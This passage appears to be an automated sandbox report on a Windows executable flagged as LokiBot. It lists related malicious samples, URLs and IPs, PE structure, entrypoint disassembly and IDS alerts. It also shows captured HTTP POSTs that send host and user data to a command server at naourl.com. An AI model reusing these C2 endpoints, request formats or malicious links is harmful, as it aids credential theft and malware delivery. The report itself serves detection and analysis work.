                        bin.exe | malicious | www.ololmychartlogin.com/p2io/?qFQl7Pf8=2q6D4S4IYN7aWdcEo+dmfNOnFlWkohYFDzpy6Q1cDMIvB7dycn+zvuYm9NNPWpGBee/B&uN9hQ=ejlP_vuP4dl4N6
                        Yd7WOb1ksAj378N.exe | malicious | www.logittechg.com/sdh/?1b8Hsf=77GdCQf+cwNQcKtc4oP1L/izBQDHSDhpXIme07zuD8PhYeFl9nbDWdZJRwCLRhIFBccKSxqqHg==&j2MHoV=aDKhQD6PL
                        SWIFT MT103_Pdf.exe | malicious | www.laytikes.com/dll/?IR-4gF=rElkgYOcKLyb2ER2+Vlm0C8Ey2iKs9RZbxxxg2Tq9pxKpXGj+SPpWyY1djYg2iNp+BFv&Cj=lN9DoTMPZhdP
                        NWvnpLrdx4.exe | malicious | www.tishomingoinn.net/da0a/?D6Ap=ZfoTzbtx3ht&0pn=Rkrz4t3Ha8KNN1GxvDSxFj/JaPfAsCp6BjG/Fo7u/30cJxHSnd0meOFBOn5zZDOPw9ZFI5pbIw==
                        Statement for T10495.jar | malicious | www.mitbss.com/bnuw/?BZ=G4og8SmNJcmToC/1vURkjn6Fi/ymhkVmkW/Vhx9xfHxVp69hNmL93pjEBnq/aUUp6pz0&I48=4hOt163

                        Domains

                        Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context

                        ASN

                        Match: LEASEWEB-NL-AMS-01, Netherlands, NL
                        Associated Sample Name / URL | Detection | Context
                        GenoSec.arm | malicious | 31.186.168.35
                        jKira.x86 | malicious | 85.17.204.186
                        sys.exe | malicious | 93.190.222.52
                        Linux_x86 | malicious | 213.227.132.36
                        rIiLBFxqPW | malicious | 46.182.122.55
                        YBni6CEBNM | malicious | 31.186.168.29
                        2018_11Informationen_betreffend_Transaktion.doc | malicious | 95.211.144.68
                        Z4joY8Uhri.exe | malicious | 5.79.68.108
                        Se adjunta la factura proforma..exe | malicious | 212.32.237.91
                        MBFlKf1tsn | malicious | 83.149.87.180
                        YwZpT3p5Rh.msi | malicious | 95.211.136.23
                        uSY5H9rWjc | malicious | 83.149.87.180
                        DkTfOvsiCR | malicious | 45.130.62.155
                        Gs4CPvVFeh | malicious | 83.149.87.180
                        Zp8WueaaAz | malicious | 83.149.87.180
                        XEhV64HdYT | malicious | 83.149.87.180
                        O86VH1rksj | malicious | 83.149.87.180
                        h6FAN1b2EW | malicious | 83.149.87.180
                        U6Qlvhqbs0 | malicious | 83.149.87.180
                        bLn8EPVC21 | malicious | 83.149.87.180

                        JA3 Fingerprints

                        No context

                        Dropped Files

                        No context

                        Created / dropped Files

                        C:\Users\user\AppData\Roaming\C79A3B\B52B3F.lck
                        Process:C:\Users\user\Desktop\rfxJzZjiWv.exe
                        File Type:very short file (no magic)
                        Category:dropped
                        Size (bytes):1
                        Entropy (8bit):0.0
                        Encrypted:false
                        SSDEEP:3:U:U
                        MD5:C4CA4238A0B923820DCC509A6F75849B
                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                        Malicious:false
                        Reputation:high, very likely benign file
                        Preview: 1
                        C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\bc49718863ee53e026d805ec372039e9_d06ed635-68f6-4e9a-955c-4899f5f57b9a
                        Process:C:\Users\user\Desktop\rfxJzZjiWv.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):46
                        Entropy (8bit):1.0424600748477153
                        Encrypted:false
                        SSDEEP:3:/lbq:4
                        MD5:8CB7B7F28464C3FCBAE8A10C46204572
                        SHA1:767FE80969EC2E67F54CC1B6D383C76E7859E2DE
                        SHA-256:ED5E3DCEB0A1D68803745084985051C1ED41E11AC611DF8600B1A471F3752E96
                        SHA-512:9BA84225FDB6C0FD69AD99B69824EC5B8D2B8FD3BB4610576DB4AD79ADF381F7F82C4C9522EC89F7171907577FAF1B4E70B82364F516CF8BBFED99D2ADEA43AF
                        Malicious:false
                        Reputation:moderate, very likely benign file
                        Preview: ........................................user.

                        Static File Info

                        General

                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                        Entropy (8bit):6.05714066527445
                        TrID:
                        • Win32 Executable (generic) a (10002005/4) 99.96%
                        • Generic Win/DOS Executable (2004/3) 0.02%
                        • DOS Executable Generic (2002/1) 0.02%
                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                        File name:rfxJzZjiWv.exe
                        File size:106496
                        MD5:8ed7e6b478cf0c00934bb42e3bdf5e20
                        SHA1:ceb70c6dc5a85a64cc7a47e0ec12936f2d5e57db
                        SHA256:4395224e257fe5659011fb90649c89d295e80123d7622d6cdb5b09371573e1aa
                        SHA512:db4f78f56df60bcc906588546d0bb55b7ff9ec483484a6d70f891bb33fc84339cf1ee77973f785f1f71d6b1eb8090449078bdc8ededb70a41c094cfa0b5affee
                        SSDEEP:1536:czvQSZpGS4/31A6mQgL2eYCGDwRcMkVQd8YhY0/EqdIzmd:nSHIG6mQwGmfOQd8YhY0/EgUG
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........x.....................K.K.............=2......................................=2......=2......Rich............PE..L.....lW...

                        File Icon

                        Icon Hash:00828e8e8686b000

                        Static PE Info

                        General

                        Entrypoint:0x4139de
                        Entrypoint Section:.text
                        Digitally signed:false
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
                        DLL Characteristics:TERMINAL_SERVER_AWARE
                        Time Stamp:0x576C0885 [Thu Jun 23 16:04:21 2016 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:5
                        OS Version Minor:1
                        File Version Major:5
                        File Version Minor:1
                        Subsystem Version Major:5
                        Subsystem Version Minor:1
                        Import Hash:0239fd611af3d0e9b0c46c5837c80e09

                        Entrypoint Preview

                        Instruction
                        push ebp
                        mov ebp, esp
                        push ecx
                        and dword ptr [ebp-04h], 00000000h
                        lea eax, dword ptr [ebp-04h]
                        push esi
                        push edi
                        push eax
                        call 00007F8788837F79h
                        push eax
                        call 00007F8788837F56h
                        xor esi, esi
                        mov edi, eax
                        pop ecx
                        pop ecx
                        cmp dword ptr [ebp-04h], esi
                        jle 00007F8788838136h
                        push 004188BCh
                        push dword ptr [edi+esi*4]
                        call 00007F878882A605h
                        pop ecx
                        pop ecx
                        test eax, eax
                        je 00007F878883811Dh
                        push 00002710h
                        call 00007F878882AEBAh
                        pop ecx
                        inc esi
                        cmp esi, dword ptr [ebp-04h]
                        jl 00007F87888380EEh
                        push 00000000h
                        call 00007F8788837F4Eh
                        push 00000000h
                        call 00007F8788838262h
                        pop ecx
                        pop edi
                        xor eax, eax
                        pop esi
                        mov esp, ebp
                        pop ebp
                        retn 0010h
                        push ebp
                        mov ebp, esp
                        xor eax, eax
                        push eax
                        push eax
                        push E567384Dh
                        push eax
                        call 00007F87888278A9h
                        push dword ptr [ebp+08h]
                        call eax
                        pop ebp
                        ret
                        push ebp
                        mov ebp, esp
                        push esi
                        mov esi, dword ptr [ebp+08h]
                        test esi, esi
                        je 00007F8788838174h
                        push esi
                        call 00007F878882A3D0h
                        pop ecx
                        test eax, eax
                        je 00007F8788838169h
                        push esi
                        call 00007F878882840Ch
                        pop ecx
                        test eax, eax
                        je 00007F878883815Eh
                        mov eax, dword ptr [0049FDECh]
                        cmp dword ptr [ebp+10h], 00000000h
                        cmovne eax, dword ptr [ebp+10h]
                        push eax
                        push dword ptr [0049FDE8h]
                        call 00007F8788829E04h
                        push dword ptr [ebp+0Ch]
                        push dword ptr [0049FDE8h]
                        call 00007F8788829DF6h
                        push 00000000h
                        push 00000000h
                        push esi

                        Rich Headers

                        Programming Language:
                        • [ASM] VS2008 SP1 build 30729
                        • [ASM] VS2003 (.NET) build 3077
                        • [ C ] VS2008 SP1 build 30729
                        • [LNK] VS2013 UPD5 build 40629
                        • [C++] VS2013 UPD5 build 40629
                        • [IMP] VS2008 SP1 build 30729

                        Data Directories

                        Name | Virtual Address | Virtual Size | Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_IMPORT | 0x18ed0 | 0x64 | .rdata
                        IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_IAT | 0x15000 | 0x5c | .rdata
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                        Sections

                        Name   | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy        | Characteristics
                        .text  | 0x1000          | 0x136f5      | 0x13800  | False    | 0.568509615385  | data      | 6.49204829439  | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                        .rdata | 0x15000         | 0x4060       | 0x4200   | False    | 0.370087594697  | data      | 4.26890991196  | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .data  | 0x1a000         | 0x85e24      | 0x200    | False    | 0.12890625      | data      | 0.946496689201 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                        .x     | 0xa0000         | 0x2000       | 0x2000   | False    | 0.0181884765625 | data      | 0.198253121373 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ

                        Imports

                        DLL          | Import
                        WS2_32.dll   | getaddrinfo, freeaddrinfo, closesocket, WSAStartup, socket, send, recv, connect
                        KERNEL32.dll | GetProcessHeap, HeapFree, HeapAlloc, SetLastError, GetLastError
                        ole32.dll    | CoCreateInstance, CoInitialize, CoUninitialize
                        OLEAUT32.dll | VariantInit, SysFreeString, SysAllocString

                        Network Behavior

                        Snort IDS Alerts

                        Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                        12/04/21-23:40:25.169299 | TCP | 2024312 | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 | 49752 | 80 | 192.168.2.4 | 212.32.237.90
                        12/04/21-23:40:25.169299 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49752 | 80 | 192.168.2.4 | 212.32.237.90
                        12/04/21-23:40:25.169299 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49752 | 80 | 192.168.2.4 | 212.32.237.90
                        12/04/21-23:40:25.169299 | TCP | 2024317 | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 | 49752 | 80 | 192.168.2.4 | 212.32.237.90
                        12/04/21-23:40:26.584318 | TCP | 2024312 | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 | 49765 | 80 | 192.168.2.4 | 212.32.237.90
                        12/04/21-23:40:26.584318 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49765 | 80 | 192.168.2.4 | 212.32.237.90
                        12/04/21-23:40:26.584318 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49765 | 80 | 192.168.2.4 | 212.32.237.90
                        12/04/21-23:40:26.584318 | TCP | 2024317 | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 | 49765 | 80 | 192.168.2.4 | 212.32.237.90
                        12/04/21-23:40:27.790426 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49766 | 80 | 192.168.2.4 | 212.32.237.90
                        12/04/21-23:40:27.790426 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49766 | 80 | 192.168.2.4 | 212.32.237.90
                        12/04/21-23:40:27.790426 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49766 | 80 | 192.168.2.4 | 212.32.237.90
                        12/04/21-23:40:27.790426 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49766 | 80 | 192.168.2.4 | 212.32.237.90
                        12/04/21-23:40:28.827279 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49767 | 80 | 192.168.2.4 | 212.32.237.90
                        12/04/21-23:40:28.827279 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49767 | 80 | 192.168.2.4 | 212.32.237.90
                        12/04/21-23:40:28.827279 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49767 | 80 | 192.168.2.4 | 212.32.237.90
                        12/04/21-23:40:28.827279 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49767 | 80 | 192.168.2.4 | 212.32.237.90
                        12/04/21-23:40:29.848169 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49768 | 80 | 192.168.2.4 | 212.32.237.90
                        12/04/21-23:40:29.848169 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49768 | 80 | 192.168.2.4 | 212.32.237.90
                        12/04/21-23:40:29.848169 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49768 | 80 | 192.168.2.4 | 212.32.237.90
                        12/04/21-23:40:29.848169 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49768 | 80 | 192.168.2.4 | 212.32.237.90

                        Network Port Distribution

                        TCP Packets

                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                        Dec 4, 2021 23:40:25.141088009 CET | 49752 | 80 | 192.168.2.4 | 212.32.237.90
                        Dec 4, 2021 23:40:25.166338921 CET | 80 | 49752 | 212.32.237.90 | 192.168.2.4
                        Dec 4, 2021 23:40:25.166424036 CET | 49752 | 80 | 192.168.2.4 | 212.32.237.90
                        Dec 4, 2021 23:40:25.169298887 CET | 49752 | 80 | 192.168.2.4 | 212.32.237.90
                        Dec 4, 2021 23:40:25.195113897 CET | 80 | 49752 | 212.32.237.90 | 192.168.2.4
                        Dec 4, 2021 23:40:25.195162058 CET | 49752 | 80 | 192.168.2.4 | 212.32.237.90
                        Dec 4, 2021 23:40:25.220299959 CET | 80 | 49752 | 212.32.237.90 | 192.168.2.4
                        Dec 4, 2021 23:40:25.426904917 CET | 80 | 49752 | 212.32.237.90 | 192.168.2.4
                        Dec 4, 2021 23:40:25.427032948 CET | 49752 | 80 | 192.168.2.4 | 212.32.237.90
                        Dec 4, 2021 23:40:25.427285910 CET | 80 | 49752 | 212.32.237.90 | 192.168.2.4
                        Dec 4, 2021 23:40:25.427331924 CET | 49752 | 80 | 192.168.2.4 | 212.32.237.90
                        Dec 4, 2021 23:40:25.452235937 CET | 80 | 49752 | 212.32.237.90 | 192.168.2.4
                        Dec 4, 2021 23:40:26.553580999 CET | 49765 | 80 | 192.168.2.4 | 212.32.237.90
                        Dec 4, 2021 23:40:26.579066038 CET | 80 | 49765 | 212.32.237.90 | 192.168.2.4
                        Dec 4, 2021 23:40:26.579268932 CET | 49765 | 80 | 192.168.2.4 | 212.32.237.90
                        Dec 4, 2021 23:40:26.584317923 CET | 49765 | 80 | 192.168.2.4 | 212.32.237.90
                        Dec 4, 2021 23:40:26.609769106 CET | 80 | 49765 | 212.32.237.90 | 192.168.2.4
                        Dec 4, 2021 23:40:26.609910011 CET | 49765 | 80 | 192.168.2.4 | 212.32.237.90
                        Dec 4, 2021 23:40:26.635215998 CET | 80 | 49765 | 212.32.237.90 | 192.168.2.4
                        Dec 4, 2021 23:40:26.847377062 CET | 80 | 49765 | 212.32.237.90 | 192.168.2.4
                        Dec 4, 2021 23:40:26.847559929 CET | 80 | 49765 | 212.32.237.90 | 192.168.2.4
                        Dec 4, 2021 23:40:26.847645998 CET | 49765 | 80 | 192.168.2.4 | 212.32.237.90
                        Dec 4, 2021 23:40:26.873150110 CET | 80 | 49765 | 212.32.237.90 | 192.168.2.4
                        Dec 4, 2021 23:40:27.761544943 CET | 49766 | 80 | 192.168.2.4 | 212.32.237.90
                        Dec 4, 2021 23:40:27.787653923 CET | 80 | 49766 | 212.32.237.90 | 192.168.2.4
                        Dec 4, 2021 23:40:27.787765980 CET | 49766 | 80 | 192.168.2.4 | 212.32.237.90
                        Dec 4, 2021 23:40:27.790426016 CET | 49766 | 80 | 192.168.2.4 | 212.32.237.90
                        Dec 4, 2021 23:40:27.815903902 CET | 80 | 49766 | 212.32.237.90 | 192.168.2.4
                        Dec 4, 2021 23:40:27.816095114 CET | 49766 | 80 | 192.168.2.4 | 212.32.237.90
                        Dec 4, 2021 23:40:27.827552080 CET | 80 | 49766 | 212.32.237.90 | 192.168.2.4
                        Dec 4, 2021 23:40:27.827702045 CET | 49766 | 80 | 192.168.2.4 | 212.32.237.90
                        Dec 4, 2021 23:40:27.827722073 CET | 80 | 49766 | 212.32.237.90 | 192.168.2.4
                        Dec 4, 2021 23:40:27.827779055 CET | 49766 | 80 | 192.168.2.4 | 212.32.237.90
                        Dec 4, 2021 23:40:27.853832006 CET | 80 | 49766 | 212.32.237.90 | 192.168.2.4
                        Dec 4, 2021 23:40:28.797764063 CET | 49767 | 80 | 192.168.2.4 | 212.32.237.90
                        Dec 4, 2021 23:40:28.823947906 CET | 80 | 49767 | 212.32.237.90 | 192.168.2.4
                        Dec 4, 2021 23:40:28.824559927 CET | 49767 | 80 | 192.168.2.4 | 212.32.237.90
                        Dec 4, 2021 23:40:28.827279091 CET | 49767 | 80 | 192.168.2.4 | 212.32.237.90
                        Dec 4, 2021 23:40:28.853244066 CET | 80 | 49767 | 212.32.237.90 | 192.168.2.4
                        Dec 4, 2021 23:40:28.856611013 CET | 49767 | 80 | 192.168.2.4 | 212.32.237.90
                        Dec 4, 2021 23:40:28.868113041 CET | 80 | 49767 | 212.32.237.90 | 192.168.2.4
                        Dec 4, 2021 23:40:28.868171930 CET | 80 | 49767 | 212.32.237.90 | 192.168.2.4
                        Dec 4, 2021 23:40:28.868345022 CET | 49767 | 80 | 192.168.2.4 | 212.32.237.90
                        Dec 4, 2021 23:40:28.868428946 CET | 49767 | 80 | 192.168.2.4 | 212.32.237.90
                        Dec 4, 2021 23:40:28.894344091 CET | 80 | 49767 | 212.32.237.90 | 192.168.2.4
                        Dec 4, 2021 23:40:29.819633961 CET | 49768 | 80 | 192.168.2.4 | 212.32.237.90
                        Dec 4, 2021 23:40:29.845372915 CET | 80 | 49768 | 212.32.237.90 | 192.168.2.4
                        Dec 4, 2021 23:40:29.845504045 CET | 49768 | 80 | 192.168.2.4 | 212.32.237.90
                        Dec 4, 2021 23:40:29.848169088 CET | 49768 | 80 | 192.168.2.4 | 212.32.237.90
                        Dec 4, 2021 23:40:29.873876095 CET | 80 | 49768 | 212.32.237.90 | 192.168.2.4
                        Dec 4, 2021 23:40:29.874062061 CET | 49768 | 80 | 192.168.2.4 | 212.32.237.90
                        Dec 4, 2021 23:40:29.886748075 CET | 80 | 49768 | 212.32.237.90 | 192.168.2.4
                        Dec 4, 2021 23:40:29.886892080 CET | 49768 | 80 | 192.168.2.4 | 212.32.237.90
                        Dec 4, 2021 23:40:29.887314081 CET | 80 | 49768 | 212.32.237.90 | 192.168.2.4
                        Dec 4, 2021 23:40:29.887382030 CET | 49768 | 80 | 192.168.2.4 | 212.32.237.90
                        Dec 4, 2021 23:40:29.912643909 CET | 80 | 49768 | 212.32.237.90 | 192.168.2.4

                        UDP Packets

                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                        Dec 4, 2021 23:40:25.106108904 CET | 64549 | 53 | 192.168.2.4 | 8.8.8.8
                        Dec 4, 2021 23:40:25.134881973 CET | 53 | 64549 | 8.8.8.8 | 192.168.2.4
                        Dec 4, 2021 23:40:26.530941963 CET | 63153 | 53 | 192.168.2.4 | 8.8.8.8
                        Dec 4, 2021 23:40:26.550316095 CET | 53 | 63153 | 8.8.8.8 | 192.168.2.4
                        Dec 4, 2021 23:40:27.739684105 CET | 52991 | 53 | 192.168.2.4 | 8.8.8.8
                        Dec 4, 2021 23:40:27.760241985 CET | 53 | 52991 | 8.8.8.8 | 192.168.2.4
                        Dec 4, 2021 23:40:28.773323059 CET | 53700 | 53 | 192.168.2.4 | 8.8.8.8
                        Dec 4, 2021 23:40:28.793174028 CET | 53 | 53700 | 8.8.8.8 | 192.168.2.4
                        Dec 4, 2021 23:40:29.799994946 CET | 51726 | 53 | 192.168.2.4 | 8.8.8.8
                        Dec 4, 2021 23:40:29.817958117 CET | 53 | 51726 | 8.8.8.8 | 192.168.2.4

                        DNS Queries

                        Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                        Dec 4, 2021 23:40:25.106108904 CET | 192.168.2.4 | 8.8.8.8 | 0x905a | Standard query (0) | naourl.com | A (IP address) | IN (0x0001)
                        Dec 4, 2021 23:40:26.530941963 CET | 192.168.2.4 | 8.8.8.8 | 0x60da | Standard query (0) | naourl.com | A (IP address) | IN (0x0001)
                        Dec 4, 2021 23:40:27.739684105 CET | 192.168.2.4 | 8.8.8.8 | 0xd8e0 | Standard query (0) | naourl.com | A (IP address) | IN (0x0001)
                        Dec 4, 2021 23:40:28.773323059 CET | 192.168.2.4 | 8.8.8.8 | 0x48fa | Standard query (0) | naourl.com | A (IP address) | IN (0x0001)
                        Dec 4, 2021 23:40:29.799994946 CET | 192.168.2.4 | 8.8.8.8 | 0x402a | Standard query (0) | naourl.com | A (IP address) | IN (0x0001)

                        DNS Answers

                        Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                        Dec 4, 2021 23:40:25.134881973 CET | 8.8.8.8 | 192.168.2.4 | 0x905a | No error (0) | naourl.com | | 212.32.237.90 | A (IP address) | IN (0x0001)
                        Dec 4, 2021 23:40:26.550316095 CET | 8.8.8.8 | 192.168.2.4 | 0x60da | No error (0) | naourl.com | | 212.32.237.90 | A (IP address) | IN (0x0001)
                        Dec 4, 2021 23:40:27.760241985 CET | 8.8.8.8 | 192.168.2.4 | 0xd8e0 | No error (0) | naourl.com | | 212.32.237.90 | A (IP address) | IN (0x0001)
                        Dec 4, 2021 23:40:28.793174028 CET | 8.8.8.8 | 192.168.2.4 | 0x48fa | No error (0) | naourl.com | | 212.32.237.90 | A (IP address) | IN (0x0001)
                        Dec 4, 2021 23:40:29.817958117 CET | 8.8.8.8 | 192.168.2.4 | 0x402a | No error (0) | naourl.com | | 212.32.237.90 | A (IP address) | IN (0x0001)

                        HTTP Request Dependency Graph

                        • naourl.com

                        HTTP Packets

                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                        0 | 192.168.2.4 | 49752 | 212.32.237.90 | 80 | C:\Users\user\Desktop\rfxJzZjiWv.exe
                        Timestamp | kBytes transferred | Direction | Data
                        Dec 4, 2021 23:40:25.169298887 CET | 540 | OUT | POST /data/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: naourl.com
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 7B0651A2
                        Content-Length: 190
                        Connection: close
                        Dec 4, 2021 23:40:25.195162058 CET | 541 | OUT | Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 30 00 34 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                        Data Ascii: 'ckav.rujones216041DESKTOP-716T771k08F9C4E9C79A3B52B3F739430P15iq
                        Dec 4, 2021 23:40:25.426904917 CET | 667 | IN | HTTP/1.1 302 Found
                        cache-control: max-age=0, private, must-revalidate
                        connection: close
                        content-length: 11
                        date: Sat, 04 Dec 2021 22:40:25 GMT
                        location: http://survey-smiles.com
                        server: nginx
                        set-cookie: sid=2c169730-5553-11ec-a6f5-1bd523c5916e; path=/; domain=.naourl.com; expires=Fri, 23 Dec 2089 01:54:32 GMT; max-age=2147483647; HttpOnly
                        Data Raw: 52 65 64 69 72 65 63 74 69 6e 67
                        Data Ascii: Redirecting


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                        1 | 192.168.2.4 | 49765 | 212.32.237.90 | 80 | C:\Users\user\Desktop\rfxJzZjiWv.exe
                        Timestamp | kBytes transferred | Direction | Data
                        Dec 4, 2021 23:40:26.584317923 CET | 1166 | OUT | POST /data/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: naourl.com
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 7B0651A2
                        Content-Length: 190
                        Connection: close
                        Dec 4, 2021 23:40:26.609910011 CET | 1166 | OUT | Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 30 00 34 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                        Data Ascii: 'ckav.rujones216041DESKTOP-716T771+08F9C4E9C79A3B52B3F739430FQRo5
                        Dec 4, 2021 23:40:26.847377062 CET | 1167 | IN | HTTP/1.1 302 Found
                        cache-control: max-age=0, private, must-revalidate
                        connection: close
                        content-length: 11
                        date: Sat, 04 Dec 2021 22:40:26 GMT
                        location: http://survey-smiles.com
                        server: nginx
                        set-cookie: sid=2cf1b194-5553-11ec-a729-1bd5acd08a42; path=/; domain=.naourl.com; expires=Fri, 23 Dec 2089 01:54:33 GMT; max-age=2147483647; HttpOnly
                        Data Raw: 52 65 64 69 72 65 63 74 69 6e 67
                        Data Ascii: Redirecting


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                        2 | 192.168.2.4 | 49766 | 212.32.237.90 | 80 | C:\Users\user\Desktop\rfxJzZjiWv.exe
                        Timestamp | kBytes transferred | Direction | Data
                        Dec 4, 2021 23:40:27.790426016 CET | 1168 | OUT | POST /data/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: naourl.com
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 7B0651A2
                        Content-Length: 163
                        Connection: close
                        Dec 4, 2021 23:40:27.816095114 CET | 1168 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 30 00 34 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                        Data Ascii: (ckav.rujones216041DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                        Dec 4, 2021 23:40:27.827552080 CET | 1168 | IN | HTTP/1.1 302 Found
                        cache-control: max-age=0, private, must-revalidate
                        connection: close
                        content-length: 11
                        date: Sat, 04 Dec 2021 22:40:27 GMT
                        location: http://survey-smiles.com
                        server: nginx
                        set-cookie: sid=2da4e8c2-5553-11ec-baa8-1bd5fde30033; path=/; domain=.naourl.com; expires=Fri, 23 Dec 2089 01:54:34 GMT; max-age=2147483647; HttpOnly
                        Data Raw: 52 65 64 69 72 65 63 74 69 6e 67
                        Data Ascii: Redirecting


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                        3 | 192.168.2.4 | 49767 | 212.32.237.90 | 80 | C:\Users\user\Desktop\rfxJzZjiWv.exe
                        Timestamp | kBytes transferred | Direction | Data
                        Dec 4, 2021 23:40:28.827279091 CET | 1169 | OUT | POST /data/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: naourl.com
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 7B0651A2
                        Content-Length: 163
                        Connection: close
                        Dec 4, 2021 23:40:28.856611013 CET | 1169 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 30 00 34 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                        Data Ascii: (ckav.rujones216041DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                        Dec 4, 2021 23:40:28.868113041 CET | 1170 | IN | HTTP/1.1 302 Found
                        cache-control: max-age=0, private, must-revalidate
                        connection: close
                        content-length: 11
